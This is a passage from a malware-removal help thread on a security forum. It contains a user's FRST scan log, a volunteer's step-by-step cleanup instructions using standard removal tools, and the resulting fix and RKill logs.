S3 SmbDrv; C:\Windows\System32\DRIVERS\Smb_driver.sys [22800 2012-08-15] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [34544 2013-10-16] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [16152 2014-10-26] ()
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-02-17] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-02-17] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 08:01 - 2014-10-26 08:01 - 00020642 _____ () C:\Users\Greg\Desktop\FRST.txt
2014-10-25 13:38 - 2014-10-25 13:37 - 00004738 _____ () C:\Users\Greg\Desktop\fixlist.txt
2014-10-25 13:38 - 2014-10-25 09:37 - 02112512 _____ (Farbar) C:\Users\Greg\Desktop\frst64.exe
2014-10-22 06:49 - 2014-10-26 08:01 - 00000000 ____D () C:\FRST
2014-10-22 00:31 - 2014-10-22 00:33 - 00000000 ____D () C:\AdwCleaner
2014-10-22 00:02 - 2014-10-25 22:19 - 00000000 ____D () C:\Users\Greg\Desktop\VirusCleanup
2014-10-21 15:04 - 2014-10-21 15:04 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Exploit.lnk
2014-10-21 15:04 - 2014-10-21 15:04 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Exploit
2014-10-21 12:23 - 2014-10-26 07:28 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-21 12:22 - 2014-10-21 15:01 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-21 12:22 - 2014-10-21 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-21 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-21 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-20 19:42 - 2014-10-20 20:31 - 00000000 ____D () C:\Users\Greg\AppData\Local\NPE
2014-10-16 11:01 - 2014-10-16 11:01 - 00001163 _____ () C:\SeagateAdapter
2014-10-15 17:38 - 2014-10-15 17:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 17:38 - 2014-10-15 17:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 14:42 - 2014-10-17 15:27 - 00000000 ____D () C:\Users\Greg\AppData\Local\American Enterprise
2014-10-15 14:41 - 2014-10-15 14:41 - 00000358 _____ () C:\Users\Greg\Desktop\Medico.appref-ms
2014-10-15 14:41 - 2014-10-15 14:41 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\American Enterprise Group, Inc
2014-10-13 22:31 - 2014-10-13 22:31 - 00001627 _____ () C:\Users\Greg\Desktop\Clients_Medicare.csv
2014-10-13 16:10 - 2014-10-21 16:29 - 00000000 ____D () C:\Users\Greg\Documents\Pacific life
2014-10-04 09:50 - 2014-10-04 09:50 - 00000000 ____D () C:\Windows\System32\Tasks\Norton 360
2014-09-30 06:43 - 2014-09-30 06:43 - 00000000 ____D () C:\Users\Greg\Documents\Millionaire Series

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 07:50 - 2013-09-03 19:55 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-26 07:47 - 2011-07-14 16:02 - 00000000 ____D () C:\Users\Greg
2014-10-26 07:46 - 2014-02-04 15:00 - 00000556 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000.job
2014-10-26 07:41 - 2011-07-14 16:07 - 01870763 _____ () C:\Windows\WindowsUpdate.log
2014-10-26 07:35 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-26 07:35 - 2009-07-14 00:45 - 00013760 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-26 07:28 - 2013-09-05 18:28 - 00016152 _____ () C:\Windows\system32\Drivers\SWDUMon.sys
2014-10-26 07:28 - 2013-09-05 18:28 - 00002840 _____ () C:\Windows\System32\Tasks\DriverUpdate Startup
2014-10-26 07:28 - 2013-09-05 18:28 - 00000416 _____ () C:\Windows\Tasks\DriverUpdate Startup.job
2014-10-26 07:28 - 2011-07-14 23:39 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-26 07:27 - 2013-01-20 11:25 - 00000000 ____D () C:\Temp
2014-10-26 07:27 - 2012-09-30 13:59 - 00000000 ____D () C:\Program Files\Google
2014-10-26 07:27 - 2011-09-30 08:15 - 02519744 _____ () C:\Windows\PFRO.log
2014-10-26 07:27 - 2011-09-27 10:54 - 25104101 _____ () C:\Windows\setupact.log
2014-10-26 07:27 - 2011-07-14 23:39 - 00000000 ____D () C:\Program Files (x86)\Google
2014-10-26 07:27 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-25 22:23 - 2013-12-12 22:11 - 00000000 ____D () C:\Users\Greg\AppData\Local\Google
2014-10-25 22:22 - 2014-05-29 11:10 - 00000000 ____D () C:\Users\Public\Documents\bc13SupportFiles
2014-10-25 22:22 - 2014-05-29 11:10 - 00000000 ____D () C:\Program Files (x86)\BenFit14
2014-10-25 22:19 - 2011-07-14 23:39 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-22 23:12 - 2012-11-15 16:02 - 00000000 ____D () C:\Users\Greg\AppData\Local\CrashDumps
2014-10-21 21:39 - 2009-07-14 01:08 - 00032576 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-21 21:15 - 2012-08-14 20:57 - 00000000 ____D () C:\Users\Greg\Documents\Outlook Files
2014-10-21 20:46 - 2012-09-30 09:49 - 00000000 ____D () C:\Users\Greg\AppData\Local\Deployment
2014-10-21 18:04 - 2012-06-14 14:55 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-21 15:58 - 2011-12-08 09:44 - 00000000 ____D () C:\Users\Greg\AppData\Local\join.me
2014-10-21 12:24 - 2009-07-14 01:13 - 00852346 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-21 10:28 - 2011-08-25 06:57 - 00000000 ____D () C:\Firefox
2014-10-21 09:33 - 2012-10-10 09:17 - 00000000 ____D () C:\Users\Greg\Finance
2014-10-20 20:36 - 2012-10-10 07:16 - 00000000 ____D () C:\Users\Greg\DVDs
2014-10-20 19:45 - 2013-01-11 19:50 - 00000000 ____D () C:\NPE
2014-10-20 16:53 - 2011-07-14 16:35 - 00844468 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-10-20 16:51 - 2013-08-15 03:00 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-20 10:16 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\7-BOOK OF BUSINESS
2014-10-20 09:56 - 2014-04-05 16:24 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\GoodSync
2014-10-19 12:48 - 2012-10-09 22:38 - 00000000 ____D () C:\Users\Greg\Vacation
2014-10-18 11:00 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\3 INS CO LOGIN
2014-10-18 10:50 - 2012-11-07 16:05 - 00000000 ____D () C:\Users\Greg\Documents\CASE DESIGN
2014-10-18 07:22 - 2011-07-14 23:39 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 07:22 - 2011-07-14 23:39 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 15:26 - 2013-07-28 07:34 - 00000000 ____D () C:\Users\Greg\Documents\Retirement Planning
2014-10-17 14:21 - 2014-04-05 16:19 - 00000000 ____D () C:\Users\Greg\Robo Form
2014-10-17 11:07 - 2013-08-05 21:51 - 00000000 ____D () C:\Users\Greg\Documents\EquiTrust
2014-10-17 09:05 - 2014-05-14 08:51 - 00000000 ____D () C:\Users\Greg\Documents\Life Ins
2014-10-16 20:19 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Advertising & Marketing
2014-10-16 17:03 - 2011-10-02 15:51 - 00002455 _____ () C:\Users\Greg\Documents\4 LEAD CO - Shortcut.lnk
2014-10-15 19:32 - 2014-02-19 17:31 - 00002102 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-15 17:38 - 2012-07-10 14:09 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-15 04:44 - 2013-01-20 11:23 - 00000000 ____D () C:\Users\Greg\AppData\Roaming\MotoCast
2014-10-15 03:27 - 2013-01-20 11:26 - 00000000 ____D () C:\Users\Greg\.gstreamer-0.10
2014-10-14 20:52 - 2014-04-05 14:03 - 00000000 ____D () C:\Users\Greg\Documents\001 Archive Folder
2014-10-14 18:48 - 2011-07-13 19:10 - 00000000 ____D () C:\Users\Greg\Documents\Aetna Ind Health
2014-10-14 16:30 - 2012-09-04 14:12 - 00000000 ____D () C:\Users\Greg\Documents\State Licenses
2014-10-14 13:20 - 2014-02-04 15:00 - 00003578 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3448307080-1944955064-2909665858-1000
2014-10-14 12:13 - 2012-10-09 22:24 - 00000000 ____D () C:\Users\Greg\Cars & Cycles
2014-10-14 09:45 - 2014-04-02 17:53 - 00000214 _____ () C:\Users\Greg\Desktop\LPI Policies.url
2014-10-13 16:31 - 2012-06-22 09:30 - 00000000 ____D () C:\Users\Greg\AppData\Local\Downloaded Installations
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-10-13 15:36 - 2013-03-12 21:47 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-10-13 12:47 - 2013-11-29 17:53 - 00000000 ____D () C:\Users\Greg\1 - Read
2014-10-04 09:44 - 2013-08-07 20:35 - 00003238 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-10-04 09:44 - 2013-08-07 20:34 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-04 08:41 - 2013-04-05 13:46 - 00000294 _____ () C:\Users\Greg\Desktop\Go Daddy Email.url
2014-10-03 10:59 - 2013-03-09 09:57 - 00000000 ____D () C:\Users\Greg\Documents\01 Read
2014-10-03 10:02 - 2011-07-14 16:41 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 21:35 - 2012-08-16 21:57 - 00000000 ____D () C:\Users\Greg\Documents\Vacation
2014-10-02 05:52 - 2014-08-26 13:36 - 00000000 ____D () C:\Users\Greg\Food Storage
2014-09-30 14:41 - 2014-09-05 14:22 - 00000000 ____D () C:\Users\Greg\Documents\Provident Trust
2014-09-30 12:09 - 2011-11-04 11:03 - 00000000 __SHD () C:\Users\Greg\Documents\cache
2014-09-30 11:00 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\MEDICARE
2014-09-30 06:42 - 2014-05-09 15:09 - 00000000 ____D () C:\Users\Greg\Documents\Safe Money
2014-09-30 06:38 - 2011-09-29 10:02 - 00000000 ____D () C:\Users\Greg\Documents\Funeral Trusts - Legacy Safeguard & NGL
2014-09-30 06:31 - 2011-07-13 19:11 - 00000000 ____D () C:\Users\Greg\Documents\Client Contact List
2014-09-30 06:23 - 2014-01-29 14:09 - 00000000 ____D () C:\Users\Greg\Documents\APPS PENDING-14
2014-09-30 06:23 - 2013-12-09 18:31 - 00000000 ____D () C:\Users\Greg\Documents\HIX
2014-09-30 06:13 - 2012-07-20 12:34 - 00000000 ____D () C:\Users\Greg\Documents\ID Theft & Legal Shield
2014-09-26 12:43 - 2013-02-19 13:35 - 00000000 ____D () C:\Users\Greg\Documents\SOCIAL SECURITY

Some content of TEMP:
====================
C:\Users\Greg\AppData\Local\Temp\guninst.exe
C:\Users\Greg\AppData\Local\Temp\sqlite3.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite24165.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite55383.dll
C:\Users\Greg\AppData\Local\Temp\System.Data.SQLite87103.dll
C:\Users\Greg\AppData\Local\Temp\UNINSTALL.EXE


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-16 00:49

==================== End Of Log ============================

#9 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 26 October 2014 - 06:12 PM

Hello Sue,

 

Yeah, you should be ok to reconnect your computer to internet since both logs are clean and the infection has been removed.

We can delete one adware extension for Firefox missed by me in the previous fix.

 

 

 

Please download the following file => and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

Run FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

 

However, although the malware has been removed if you don't mind, I want to make sure there is nothing lurking on the system so just in case I want you to go through these steps:

 

The most of them should take no more than 5 minutes each (but the time they take to complete can vary depending on the size of your hard and the speed of your computer).

 

 

 

STEP 1

 

  • Please download RKill by Grinler from the link below and save it to your desktop.

    Rkill
  • Before we begin, you should disable your anti-malware softwares you have installed so they do not interfere RKill running as some anti-malware softwares detect RKill as malicious. Please refer to this page if you are not sure how.
  • Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
  • A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
  • If nothing happens or if the tool does not run, please let me know in your next reply.
  • A log pops up at the end of the run. This log file is located at C:\rkill.log.
  • Please post the log in your next reply.

 

 

STEP 2

 

 

  • Please download RogueKillerx64.exe and save to the desktop.
  • Close all windows and browsers
  • Right-click the program and select 'Run as Administrator'
  • Press the scan button.
  • A report opens on the desktop named - RKreport.txt
  • Please copy and past the results at pastebin.com and post the link to the log in your next reply.

 

 

STEP 3
 

 

Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.
     
  • Put a checkmark beside loaded modules.
    Sbf88.png
  • A reboot will be needed to apply the changes. Do it.
  • TDSSKiller will launch automatically after the reboot. Also your computer may seem very slow and unusable. This is normal. Give it enough time to load your background programs.
  • Then click on Change parameters in TDSSKiller.
  • Check all boxes then click OK.
  • Click the Start Scan button.
  • The scan should take no longer than 2 minutes.
  • If a suspicious object is detected, the default action will be Skip, click on Continue.
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.
    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and past the results at pastebin.com and post the link to the log in your next reply.

 

 

STEP 4

 

 

Please download Malwarebytes Anti-Malware 2.0.3.1025 Final to your desktop.
 

  • Double-click mbam-setup-2.0.3.1025.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • With some infections, you may see this message box.
    • 'Could not load DDA driver'
  • Click 'Yes' to this message, to allow the driver to load after a restart.
  • Allow the computer to restart. Continue with the rest of these instructions.
  • When the scan is complete, click Apply Actions.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

 

STEP 5

 

 

1.Please download HitmanPro.

  • For 32-bit Operating System - dEMD6.gif.
  • This is the mirror - dEMD6.gif
  • For 64-bit Operating System - dEMD6.gif
  • This is the mirror - dEMD6.gif

2.Launch the program by double clicking on the 5vo5F.jpg icon. (Windows Vista/7 users right click on the HitmanPro icon and select run as administrator).

Note: If the program won't run please then open the program while holding down the left CTRL key until the program is loaded.

3.Click on the next button. You must agree with the terms of EULA. (if asked)

4.Check the box beside "No, I only want to perform a one-time scan to check this computer".

5.Click on the next button.

6.The program will start to scan the computer. The scan will typically take no more than 2-3 minutes.

7.When the scan is done click on drop-down menu of the found entries (if any) and choose - Apply to all => Ignore <= IMPORTANT!!!

 

6-scanfin-choose.jpg
 
8.Click on the next button.

9.Click on the "Save Log" button.

10.Save that file to your desktop and post the content of that file in your next reply.
 
Note: if there isn't a dropdown menu when the scan is done then please don't delete anything and close HitmanPro

Navigate to C:\ProgramData\HitmanPro\Logs open the report and copy and paste it to your next reply.

 

 

 

STEP 6

 

 

Download Security Check by screen317 from here.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • A Notepad document should open automatically called checkup.txt; please post the contents of that document

 

 

Regards,

Georgi


cXfZ4wS.png


#10 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 26 October 2014 - 06:19 PM

I will start working through these steps in the order listed. However, I think there is still an issue with the infection. I connected the 'cleaned' computer to the internet and tried to download the fix file, but I get a message that my Current security settings do not allow this file to be downloaded." it is a plain gray dialog box, with no logo. This was the original symptom.

 

I'll run the fix and other scans by downloading to a jump drive as I was doing before.



#11 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 26 October 2014 - 06:39 PM

Fixlog.txt

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 26-10-2014

Ran by Greg at 2014-10-26 19:25:14 Run:2

Running from C:\Users\Greg\Desktop

Loaded Profile: Greg (Available profiles: Greg)

Boot Mode: Normal

==============================================

Content of fixlist:

*****************

start

FF Extension: Word Layers - C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net [2013-10-16]

emptytemp:

end

*****************

C:\Program Files (x86)\Mozilla Firefox\extensions\ugnraew@jqhljqmpngx.net => Moved successfully.

EmptyTemp: => Removed 73 MB temporary data.

 

The system needed a reboot.

==== End of Fixlog ====

 

starting Step 1, RKill



#12 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 26 October 2014 - 06:50 PM

Step 1 - Rkill.log

 

Rkill 2.6.8 by Lawrence Abrams (Grinler)
http://www.bleepingcomputer.com/
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 http://www.bleepingcomputer.com/forums/topic308364.html

Program started at: 10/26/2014 07:46:39 PM in x64 mode.
Windows Version: Windows 7 Home Premium Service Pack 1

Checking for Windows services to stop:

 * No malware services found to stop.

Checking for processes to terminate:

 * No malware processes found to kill.

Checking Registry for malware related settings:

 * No issues found in the Registry.

Resetting .EXE, .COM, & .BAT associations in the Windows Registry.

Performing miscellaneous checks:

 * Windows Defender Disabled

   [HKLM\SOFTWARE\Microsoft\Windows Defender]
   "DisableAntiSpyware" = dword:00000001

Checking Windows Service Integrity:

 * Windows Defender (WinDefend) is not Running.
   Startup Type set to: Manual

Searching for Missing Digital Signatures:

 * No issues found.

Checking HOSTS File:

 * No issues found.

Program finished at: 10/26/2014 07:48:36 PM
Execution time: 0 hours(s), 1 minute(s), and 57 seconds(s)



#13 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 26 October 2014 - 07:13 PM

Step 2 RogueKillerx64

 

log at pastebin.com  http://pastebin.com/u6J10ibH



#14 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:10:51 PM

Posted 26 October 2014 - 07:14 PM

I will start working through these steps in the order listed. However, I think there is still an issue with the infection. I connected the 'cleaned' computer to the internet and tried to download the fix file, but I get a message that my Current security settings do not allow this file to be downloaded." it is a plain gray dialog box, with no logo. This was the original symptom.

 

I'll run the fix and other scans by downloading to a jump drive as I was doing before.

 

Hi,

 

if you are using Internet Explorer then go ahead and reset the All zone to default settings:

 

http://windows.microsoft.com/en-us/windows7/change-internet-explorer-9-security-settings

 

 

Regards,

Georgi


cXfZ4wS.png


#15 sjk117

sjk117
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:03:51 PM

Posted 26 October 2014 - 07:29 PM

TDSSKiller reort

http://pastebin.com/5pX1k1FU






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users